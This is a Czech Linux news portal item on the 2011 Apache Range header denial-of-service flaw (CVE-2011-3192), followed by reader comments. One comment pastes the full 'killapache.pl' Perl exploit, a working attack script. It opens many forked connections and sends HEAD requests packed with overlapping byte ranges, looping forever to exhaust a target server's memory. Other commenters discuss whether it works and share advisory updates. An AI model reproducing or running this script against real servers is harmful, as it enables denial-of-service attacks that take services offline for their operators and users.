Portál AbcLinuxu, 1. května 2025 17:35

DoS zranitelnost webového serveru Apache

Byla objevena DoS zranitelnost webového serveru Apache (Range header DoS vulnerability Apache HTTPD 1.3/2.x, CVE-2011-3192, Bugtraq ID: 49303). V oficiálním bezpečnostním upozornění se uvádí 5 doporučení pro zmírnění dopadů útoků. Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána do 48 hodin.

25.8.2011 19:20 | Ladislav Hagara | Bezpečnostní upozornění


Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Nástroje: Začni sledovat (1) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

Vložit další komentář

25.8.2011 21:39 NN
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
Odpovědět | Sbalit | Link | Blokovat | Admin
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope\n";
	print "usage: perl killapache.pl <host> [numforks]\n";
	print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
=09
$pm =3D new Parallel::ForkManager($numforks);

$|=3D1;
srand(time());
$p =3D "";
for ($k=3D0;$k<1300;$k++) {
	$p .=3D ",5-$k";
}

for ($k=3D0;$k<$numforks;$k++) {
my $pid =3D $pm->start and next; =09
=09
$x =3D "";
my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                 PeerPort =3D> "80",
                     			 Proto    =3D> 'tcp');

$p =3D "HEAD / HTTP/1.1\r\nHost: =
$ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                 PeerPort =3D> "80",
                     			 Proto    =3D> 'tcp');

$p =3D "HEAD / HTTP/1.1\r\nHost: =
$ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
close\r\n\r\n";
print $sock $p;

$x =3D <$sock>;
if ($x =3D~ /Partial/) {
	print "host seems vuln\n";
	return 1;=09
} else {
	return 0;=09
}
}

if ($#ARGV < 0) {
	usage;
	exit;=09
}

if ($#ARGV > 1) {
	$numforks =3D $ARGV[1];
} else {$numforks =3D 50;}

$v =3D testapache();
if ($v =3D=3D 0) {
	print "Host does not seem vulnerable\n";
	exit;=09
}
while(1) {
killapache();
}
NN
25.8.2011 21:43 NN
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110820/848b4dca/attachment.obj
25.8.2011 22:09 aa
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
Utoci to a... nic sa nedeje. Aspon na mojom serveri.
MMMMMMMMM avatar 25.8.2011 22:28 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
Host does not seem vulnerable (to vidím zase já, když "útočím" na své servery)
25.8.2011 22:38 aa
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
Skus nejaky vacsi subor, potom to bude posielat po 50 paketoch a nic z toho.
pepe_ avatar 25.8.2011 22:43 pepe_ | skóre: 48
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru
Odpovědět | Sbalit | Link | Blokovat | Admin

A funguje to i s lighttpd/mysql/php5 s cgifixem ?

26.8.2011 19:07 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
Odpovědět | Sbalit | Link | Blokovat | Admin
Aktualizace bezpečnostního upozornění.
Problémem je nejenom 'Range' header ale také 'Range-Request' header.
Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána snad do 24 hodin.
Otto Šabart avatar 27.8.2011 01:10 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
Odpovědět | Sbalit | Link | Blokovat | Admin
Exploit vyšel na exploit-db.com už před 8 dny... No zkoušel jsem ho a také mi nefunguje.
*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Založit nové vláknoNahoru


ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.